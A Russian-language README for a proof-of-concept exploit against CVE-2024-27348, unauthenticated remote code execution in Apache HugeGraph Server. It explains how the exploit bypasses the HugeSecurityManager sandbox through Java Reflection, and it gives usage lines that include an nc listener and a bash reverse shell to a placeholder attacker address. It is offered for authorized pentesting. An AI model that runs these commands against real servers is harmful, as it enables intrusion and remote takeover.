
Продвинутый Proof of Concept эксплойт для CVE-2024-27348 (Apache HugeGraph RCE) с обходом песочницы HugeSecurityManager через Java Reflection, надежным выполнением полезной нагрузки ProcessBuilder и полным чтением вывода команд для не-слепой эксплуатации.
Продвинутый, высоконадёжный эксплойт Proof of Concept (PoC) для CVE-2024-27348 (удалённое выполнение кода в Apache HugeGraph Server).
В отличие от многих публичных PoC, которые выполняют команды вслепую или не справляются со сложными полезными нагрузками из-за ограничений Runtime.exec() в Java, этот скрипт разработан для надёжности в реальных сценариях пентеста.
Только для образовательных целей и авторизованного тестирования. Данный инструмент предоставляется исследователям безопасности, пентестерам и системным администраторам для проверки уязвимости в авторизованных средах. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый с помощью этого инструмента.
Данный эксплойт улучшает ранние публичные PoC, решая три критических проблемы:
gremlin-server-exec-* или task-worker-*. Эта полезная нагрузка использует Java Reflection для динамического переименования потока выполнения в BypassThread перед запуском полезной нагрузки, незаметно обходя менеджер безопасности.Runtime.getRuntime().exec(String), который ломает сложные bash-команды (например, reverse shell) из-за пробелов, этот эксплойт использует ProcessBuilder с правильно отформатированным List<String>. Это позволяет безопасно выполнять сложные полезные нагрузки с кавычками и перенаправлениями.InputStream выполненного процесса с помощью Java Scanner и возвращает фактический вывод команды в JSON-ответе HTTP. Вы видите то же, что и сервер.requestsУстановите необходимые зависимости:
pip3 install requests
python3 exploit.py -u <TARGET_URL> -c <COMMAND>
Примеры
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
# На вашей атакующей машине запустите слушатель:
nc -lvnp 4444
# Выполните эксплойт:
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
Сервер Apache HugeGraph предоставляет конечную точку Gremlin API (/gremlin), которая позволяет пользователям отправлять Groovy-скрипты. Из-за недостаточной изоляции (sandbox) в версиях до исправления неаутентифицированный злоумышленник может выполнять произвольные команды операционной системы с помощью Java Reflection.